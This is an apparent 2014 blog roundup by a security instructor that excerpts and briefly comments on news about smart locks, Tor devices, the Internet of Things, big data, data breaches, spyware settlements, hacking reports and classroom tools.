August Smart Lock Gets Key Exposure in Apple Stores
The August Smart Lock will become available for purchase at Apple retail stores in the United States starting this week, the company announced on Tuesday.
Priced at US$249.99, the smart device uses Bluetooth and a mobile app to create a virtual key.
The August Smart Lock replaces the interior portion of users' existing deadbolt locks but does not require users to change their exterior door hardware; their physical, metal keys will work with the deadbolt as well.
The device is powered by four AA batteries [Why you need to keep the key Bob] and can be installed in about 10 minutes, August said.
Once in place, the smart lock allows users to control access to their home via smartphone. They can provide temporary or ongoing access to select others at will, including creating invited guest lists from their contacts for a party or event, for example.
Log records show who has entered and exited.
It's sad to think we need to buy hardware, install special software, or go to any extra effort at all to secure our communications. The amount of “over-subscription” ($7,500 asked, $500,000+ pledged) suggests we do want security and recognize the need to pay for it.
Cassandra Khaw reports:
On the internet, everyone is susceptible to invasions of privacy. But, a group of developers is hoping to change this by kickstarting a one-stop solution for anyone looking to peruse the internet without having their personal information harvested.
Anonabox hinges on open source software known as Tor, which encrypts user activities on the World Wide Web. While some amount of technical knowledge is usually needed to implement Tor, Anonabox will purportedly offer plug-and-play usability.
Read more on The Verge.
Clearly I'm pleased to see that Harvard clearly wants to clearly clarify the clutter surrounding the Internet of Things. Definitely worth a read!
The Internet of Things is definitely becoming a Thing, in the same way that big data’s a Thing or the sharing economy’s a Thing. And the thing about a thing that becomes a Thing is, it’s easy to lose sight of the things that made it a thing before everyone declared it the Next Big Thing that will change everything.
Got it? Good. We’ll start there. With the hype over the Internet of Things behind us. Because whether or not it’s a Thing, the internet of things is already a lot of things.
… But before you read anything else, I suggest you check out Michael Porter’s new opus of an article on the Internet of Things and strategy.
It’s quite a thing.
(Related) Also mentioned in the previous article.
Search engine for the Internet of Things
“Thingful® is a search engine for the Internet of Things, providing a unique geographical index of connected objects around the world, including energy, radiation, weather, and air quality devices as well as seismographs, iBeacons, ships, aircraft and even animal trackers. Thingful’s powerful search capabilities enable people to find devices, datasets and realtime data sources by geolocation across many popular Internet of Things networks, and presents them using a proprietary patent-pending geospatial device data search ranking methodology, ThingRank®. If you are concerned about asthma, find out about any air quality monitors in your neighbourhood; somebody working with a Raspberry Pi can find others round the corner using the same computing platform; if you notice a ship moored nearby, discover more about it by tracking it on Thingful, or get notified of its movements; a citizen concerned about flooding in a new neighbourhood can look up nearby flood monitors or find others that have been measuring radiation. You might even watch the weekly movements of a shark as it explores the oceans. The possibilities are unbounded! Thingful also enables people and companies to claim and verify ownership of their things using a provenance mechanism, thereby giving them a single web page that aggregates information from all their connected devices no matter what network they’re on, in categories that include health, environment, home, transport, energy and flora & fauna. Users can also add objects to a Watchlist in order to keep track of them, monitor their realtime status and get notifications when they change.”
They talk statistics, I'm looking for immediate (hardware or software) feedback.
Training Students to Extract Value from Big Data
“As the availability of high-throughput data-collection technologies, such as information-sensing mobile devices, remote sensing, internet log records, and wireless sensor networks has grown, science, engineering, and business have rapidly transitioned from striving to develop information from scant data to a situation in which the challenge is now that the amount of information exceeds a human’s ability to examine, let alone absorb, it. Data sets are increasingly complex, and this potentially increases the problems associated with such concerns as missing information and other quality concerns, data heterogeneity, and differing data formats. The nation’s ability to make use of data depends heavily on the availability of a workforce that is properly trained and ready to tackle high-need areas. Training students to be capable in exploiting big data requires experience with statistical analysis, machine learning, and computational infrastructure that permits the real problems associated with massive data to be revealed and, ultimately, [I'm gunning for “immediately” Bob] addressed. Analysis of big data requires cross-disciplinary skills, including the ability to make modeling decisions while balancing trade-offs between optimization and approximation, all while being attentive to useful metrics and system robustness. To develop those skills in students, it is important to identify whom to teach, that is, the educational background, experience, and characteristics of a prospective data-science student; what to teach, that is, the technical and practical content that should be taught to the student; and how to teach, that is, the structure and organization of a data-science program. Training Students to Extract Value from Big Data summarizes a workshop convened in April 2014 by the National Research Council’s Committee on Applied and Theoretical Statistics to explore how best to train students to use big data. 
The workshop explored the need for training and curricula and coursework that should be included. One impetus for the workshop was the current fragmented view of what is meant by analysis of big data, data analytics, or data science. New graduate programs are introduced regularly, and they have their own notions of what is meant by those terms and, most important, of what students need to know to be proficient in data-intensive work. This report provides a variety of perspectives about those elements and about their integration into courses and curricula.”
Demographics and Big Data. Summarizing by Zip Code.
Big Data Can Guess Who You Are Based on Your Zip Code
In the era of Big Data, your zip code is a window into what you can afford to buy, but it also reveals how you spend time—and, in essence, who you are.
That's according to software company Esri, which mapped zip codes across the United States and linked them to one of 67 profiles of American market segments.
… The level of detail is striking and—from what I could tell based on cross-referencing some of my own last several zip codes of residence—pretty accurate, too. Anyone can plug a zip code into Esri's database, which makes for an addicting game of "guess my identity."
… In the United States, where there are virtually no regulations on data collection, someone trying to profile you can fairly easily learn how much money you make, your education level, whether you own a home, who you voted for, how many kids you have, how much credit card debt you're carrying, even what you thought of the series finale of How I Met Your Mother.
Dilbert nails it again. This is exactly what happens when I assign Group Projects.
Tuesday, October 14, 2014
My Computer Security students need to understand this common follow-on to security breaches.
David Allison provides a litigation update here.
The next question is how many of them will be dismissed because of lack of standing.
(Related) Another reality of security breaches – they just keep on giving you headaches. In this case it seems to have triggered other investigations...
Aaron’s agrees to refund over $25M to consumers for violating California laws, including privacy laws
Wow. I suspected Aaron’s problems over spyware in rent-to-own computers weren’t over, but they just agreed to pay $28.4 million to settle California’s charges against them that included privacy violations:
… The complaint alleges that Aaron’s violated California’s Karnette Rental-Purchase Act, which is the strongest rent-to-own law in the country, by charging improper late fees, overcharging customers who paid off contracts early, and omitting important contract disclosures.
In addition, the complaint alleges that Aaron’s violated California state privacy laws by permitting its franchised stores to install spyware on laptop computers rented to its customers. A feature in the spyware program called ‘Detective Mode’, which was installed without consumers’ consent or knowledge, allowed the Aaron’s franchisees to remotely monitor keystrokes, capture screenshots, track the physical location of consumers and even activate the rented computer’s webcam.
… Copies of the complaint and stipulated judgment are attached to the online version of this release at www.oag.ca.gov/news.
Surely Buffy, Muffin, and Chaz would not stoop to such things?
Well, this is tacky, at best. It appears some members of the Sausalito Yacht Club gained access to the membership roster. From the notification letter of October 4:
We are writing to you because of an incident at the Sausalito Yacht Club on or about October 1, 2014,wherein several members gained unauthorized access to our member roster, which includes information linking your name to your private Sausalito Yacht Club member number, the combination of which allows you to charge beverages, goods, services and meals at the club, such amounts being charged at the time and accumulated for inclusion on your next bill.
The data to which unauthorized access occurred also included your personal contact information, and in certain cases, sensitive financial account information, including accounts receivable that were overdue by sixty days or more. As best we can tell, no bank account information or credit card information was involved in this breach.
… We are also undertaking steps to strengthen access [Strange wording Bob] to sensitive financial and membership sites with new passwords required for access by authorized users.
So, will they throw the intrusive and thoughtless privacy invaders out of the Yacht Club or will money triumph?
That was rhetorical.
This seems a bit too generic for me. “Oh look, someone is hacking.”
Russian Hackers Used Bug in Microsoft Windows for Spying, Report Says
Russian hackers used a bug in Microsoft Windows to spy on several Western governments, NATO and the Ukrainian government, according to a report released Tuesday by iSight Partners, a computer security firm in Dallas.
The targets also included European energy and telecommunications companies and an undisclosed academic organization in the United States, the cybersecurity report said.
… While the vulnerability affected many versions of Windows, iSight said the Russian hackers appeared to be the only group to use the bug. The company added, however, that other companies and organizations may also have been affected by the attacks.
Sometimes you get much more than you expected.
Snapchat Hackers Could Be Prosecuted for Child Porn Offenses
Private videos and pictures shared between tens of thousands of Snapchat users -- possibly as many as 200,000 -- were posted online by hackers over the weekend in an episode dubbed the "Snappening." Much of the content is sexual, including many nude photos -- some possibly of minors.
The hackers appear to have gone for maximum embarrassment and humiliation with this particular breach: A document also published online reportedly links many of the hacked images to user names.
One of the most well known downsides of any large database. They become large targets for hackers.
After an avalanche of data breaches, South Korea’s national identity card system has been raided so thoroughly by thieves that the government says it might have to issue new ID numbers to every citizen over 17 at a possible cost of billions of dollars.
The admission is an embarrassment for a society that prides itself on its high-tech skills and has some of the fastest Internet access.
Read more on CBC.
Do you ever talk about company strategy?
Who’s Watching Your WebEx?
KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.
… Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.
… Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.
No military, no economists, not even a politician – I think their perspective might be a bit skewed.
Electronic mass surveillance – including the mass trawling of both metadata and content by the US National Security Agency – fails drastically in striking the correct balance between security and privacy that American officials and other proponents of surveillance insist they are maintaining.
We arrived at this conclusion by subjecting a wide-range of surveillance technologies to three separate assessments by three parallel expert teams representing engineers, ethicists, and lawyers. Each team conducted assessments of surveillance technologies, looking at ethical issues they raise; the legal constraints on their use – or those that should exist – on the basis of privacy and other fundamental rights; and, finally, their technical usability and cost-efficiency.
“Comprehensive” is the word. Eventually, every “Thing” will bring its own resources – then we'll never find anything.
New on LLRX – Internet-of-Things (IOT) Resources
Via LLRX - Internet-of-Things (IOT) Resources – This is a comprehensive listing of Internet-of-Things (IOT) research resources and sites available on the Internet. Marcus P. Zillman developed this guide with the goal of highlighting the most current and actionable research resources available on this topic.
For all my students.
New on LLRX – Student Research Resources Library
Via LLRX.com – Student Research Resources Library – Marcus P. Zillman developed this Student Research Resources Library to provide researchers with a comprehensive listing of reliable topical resources and sites available on the Internet.
(Related) Here's how to get started.
Wiki Summarizer Can Help Students Start Their Research Projects
Wiki Summarizer is a site that allows you to search Wikipedia, have articles summarized by key points, and provides lists of articles that are related to your original search. Wiki Summarizer also offers expandable webs of related articles. For example, I searched for "Maine" and a web of related terms was created. Clicking on the "+" symbol next to each term opens a new element of the web. The final summary aspect of the Wiki Summarizer is the hyperlinked word clouds for every Wikipedia article. You can click on any word in the word clouds to jump to the corresponding Wikipedia article.
Wiki Summarizer could be a good tool for students who are just starting a research assignment and are not quite sure what terms to use or what topics to explore. By using the Wiki Summarizer web view or word cloud view students will be able to find some terms and topics that could help them alter and or direct their searches. In other words, Wiki Summarizer could help students who have a very broad research topic narrow down their searches.
Intended for Press Releases, but might apply to research, publications and resumes.
… So, how should you approach a major publisher? The first thing you need to understand is a writer’s capacity. On average, 45% of writers only publish one story per day. In fact, 60% of writers publish two or fewer stories per day, and 40% said they publish only one story per week. Meanwhile, 40% of these writers get pitched a minimum of 20 times per day, while 11% get 50 pitches per day and 8.4% get more than 100 pitches per day. That’s 100, 250, or 500 pitches a week for only five story spots. When you take into account that only 11% of these writers “often” write a story based on content that was sent through a pitch, 45% “sometimes” do, and 39% “rarely” do, you see the pile of email waste rising well above a person’s threshold to tolerate it.
Here’s the good news: our survey found that 70% of publishers are open to getting pitched a set of ideas that fit their beat, and they prefer collaboration over getting pitched a finished asset without prior contact.
What story angles are these writers interested in collaborating on? 39% of writers said the perfect piece of content possesses exclusive research, 27% said breaking news, and 15% said emotional stories. 19% filled in “other” and stated that content relevant to their audience was most important. Other popular terms included: interesting data, actionable advice, trending/timely angles, and high arousal emotions.
...and 100% believe they are the 15%.
Teen Researchers Defend Media Multitasking – WSJ
“Some teens doing homework while listening to music and juggling tweets and texts may actually work better that way, according to an intriguing new study performed by two high-school seniors. The Portland, Ore., students were invited to the annual conference of the American Academy of Pediatrics in San Diego this past weekend to present a summary of their research, which analyzed more than 400 adolescents. The findings: Though most teens perform better when focusing on a single task, those who are “high media multitaskers”—about 15% of the study participants—performed better when working with the distractions of email and music than when focusing on a single activity. The results are a surprise. Previous research generally has found that people who think they are competent multitaskers actually perform worse than others who try to focus on one thing at a time. But the latest study looked only at teens and is one of the few multitasking-research projects focused on this age group. The student researchers suggest this may explain the different outcomes.”
We have an underutilized 3D printer. Perhaps we could work something out?
123D Catch Turns Pictures Into 3D Models
123D Catch is a free iPad and Android app. The app makes it possible to turn your pictures into a 3D model that you can manipulate on your iPad or on your Android tablet.
To create a model with 123D Catch select a physical object that you can photograph with your tablet or phone. Then take a series of pictures of that object as you either walk around it or rotate it slowly as you take pictures of it. Then select the best images from those that you took (20+ images works best) to let Autodesk process and turn into a 3D model for you. Your completed 3D models can be shared to the Autodesk community where others can view and use them.
123D Catch could be a great app for creating virtual manipulatives to use in a math or science lesson. The app could also be used to create 3D models of interesting landmarks that you visit during a vacation, but that your students would otherwise only see in 2D pictures. Finally, all of the models that you create with 123D Catch can be edited in Meshmixer and printed with a 3D printer.